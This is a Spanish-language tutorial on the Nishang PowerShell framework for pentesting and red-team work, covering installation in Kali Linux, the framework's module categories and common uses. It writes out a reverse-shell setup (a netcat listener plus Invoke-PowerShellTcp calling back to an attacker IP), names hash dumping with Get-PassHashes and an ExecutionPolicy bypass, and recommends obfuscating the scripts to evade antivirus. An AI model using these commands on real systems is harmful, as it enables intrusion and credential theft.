Nishang framework de scripts y payloads en PowerShell
Nishang framework de scripts y payloads en PowerShell
Nishang es un framework y una colección de scripts y payloads en PowerShell diseñados para ciberseguridad ofensiva, pruebas de penetración (pentesting) y ejercicios de Red Team.
En Kali Linux se utiliza principalmente en las fases de post-explotación, recolección de información y elevación de privilegios sobre entornos Windows.
🛠️ Instalación y Ubicación en Kali Linux
En versiones modernas de Kali Linux, Nishang suele venir empaquetado pero puede no estar instalado por defecto.
Para instalarlo a través del gestor de paquetes de Kali:
sudo apt update
sudo apt install nishang
Una vez instalado, los scripts se almacenan en el directorio estándar de herramientas de Kali:
cd /usr_share/nishang/
ls -la
(Si prefieres la versión más reciente directamente desde GitHub, puedes clonarlo con git clone [https://github.com/samratashok/nishang.git](https://github.com/samratashok/nishang.git)).
📂 Estructura Principal del Framework
Los scripts de Nishang están clasificados según la fase del ataque en la que se utilicen:
ActiveDirectory: Scripts para auditar y consultar objetos en Active Directory.
Antakya: Una web shell en ASPX que permite ejecutar comandos de PowerShell desde el navegador.
Bypass: Métodos para eludir la política de ejecución de PowerShell (ExecutionPolicy) o protecciones como UAC y Antivirus.
Client: Payloads armados para ataques de ingeniería social o ejecución de código (archivos
.sct, accesos directos, etc.).Escalation: Herramientas para detectar vulnerabilidades locales y elevar privilegios en el sistema víctima (ej.
Enable-DuplicateToken,Check-VM).Gather: Scripts para recolección de información (Recon), como extraer credenciales de la memoria, registros o credenciales de red (ej.
Get-PassHashes).Pivot: Herramientas para hacer pivoting o túneles a través de la máquina comprometida hacia la red interna.
Shells: Colección de Reverse Shells y Bind Shells en PowerShell (las herramientas más populares del paquete).
🚀 Uso Práctico: Las herramientas más utilizadas
1. Reverse Shells de PowerShell
Uno de los usos más comunes de Nishang es obtener una shell reversa interactiva en Windows usando únicamente componentes nativos (Living off the Land).
El script Invoke-PowerShellTcp.ps1 (ubicado en Shells/) se puede cargar en la máquina víctima para devolver la conexión al atacante:
En Kali Linux (Atacante): Inicias un oyente Netcat en el puerto deseado.
Bashnc -lvnp 4444En el script o memoria de la víctima: Se invoca la función para enviar la shell a tu IP:
PowerShellInvoke-PowerShellTcp -Reverse -IPAddress <IP_DE_KALI> -Port 4444
2. Extracción de Credenciales (Gather)
Scripts como Get-PassHashes.ps1 permiten volcar los hashes de las contraseñas de los usuarios locales del sistema Windows si cuentas con privilegios administrativos.
📌 Puntos clave a tener en cuenta
Restricciones de Ejecución (ExecutionPolicy): Por defecto, Windows restringe la ejecución de scripts
.ps1. Para omitir esta restricción temporalmente al ejecutar tus comandos, se utiliza el parámetro-ExecutionPolicy Bypass:DOSpowershell.exe -ExecutionPolicy Bypass -File script.ps1Detección por Antivirus (AV / Defender / AMSI): Al ser una herramienta muy conocida por los equipos de seguridad, la mayoría de los motores de Antivirus y la interfaz AMSI de Windows detectan los scripts de Nishang tal cual están almacenados en el repositorio. En entornos reales suele ser necesario ofuscar el código antes de ejecutarlo.